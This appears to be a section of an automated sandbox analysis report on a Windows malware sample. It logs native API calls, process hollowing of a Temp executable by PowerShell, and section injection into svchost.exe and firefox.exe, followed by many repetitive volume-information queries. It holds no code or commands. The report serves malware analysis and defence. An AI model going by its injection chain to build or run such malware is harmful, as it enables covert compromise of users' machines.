            Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
            Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
            Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
            Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
            Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
            Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
            Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exeNtClose: Direct from: 0x77382B6C
            Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
            Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
            Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
            Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
            Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
            Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exeNtQueryValueKey: Direct from: 0x77382BECJump to behavior
            Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
            Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
            Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
            Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exeNtProtectVirtualMemory: Direct from: 0x77377B2EJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeSection loaded: NULL target: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeThread register set: target process: 2032Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Users\user\AppData\Local\Temp\Opfattelsers.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe base address: 400000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe base: 1660000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Opfattelsers.exe "C:\Users\user\AppData\Local\Temp\Opfattelsers.exe"Jump to behavior
            Source: C:\Program Files (x86)\bwrQQMMaBWxGVWvjAEYOuhAAdzUjxkbJCrzkajrIoe\PxuyeSuijNdsM.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\SysWOW64\svchost.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: PxuyeSuijNdsM.exe, 00000008.00000000.2949932754.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, PxuyeSuijNdsM.exe, 00000008.00000002.3360735341.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
            Source: PxuyeSuijNdsM.exe, 00000008.00000000.2949932754.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, PxuyeSuijNdsM.exe, 00000008.00000002.3360735341.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: PxuyeSuijNdsM.exe, 00000008.00000000.2949932754.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, PxuyeSuijNdsM.exe, 00000008.00000002.3360735341.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: PxuyeSuijNdsM.exe, 00000008.00000000.2949932754.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, PxuyeSuijNdsM.exe, 00000008.00000002.3360735341.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
